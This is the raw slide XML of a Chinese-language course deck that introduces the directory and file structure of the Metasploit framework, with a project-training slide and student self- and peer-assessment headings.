              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="文本框 114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604510" y="774383"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.使用“cd usr/share/metasploit-framework/lib/msf/base”命令进入base目录并查看该目录下的文件，如图2-4-5所示。在 base目录下存放着简化的API接口文件。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604510" y="1973263"/>
            <a:ext cx="4733925" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="文本框 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604510" y="2954655"/>
            <a:ext cx="5080000" cy="1991360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-5 base目录下的文件5.使用“cd usr/share/metasploit-framework/modules”命令进入Metasploit工具的模块存放目录，并查看目录中的文件，如图2-4-6所示。modules目录下各种类型的模块放在对应名字的目录中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604510" y="4945698"/>
            <a:ext cx="4876800" cy="752475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="文本框 116"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5604510" y="5698173"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-6 模块存放目录下的文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3171825" y="2599055"/>
            <a:ext cx="5027930" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.了解Metasploit框架结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.了解Metasploit文件结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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11" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.1 认识Metasploit</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
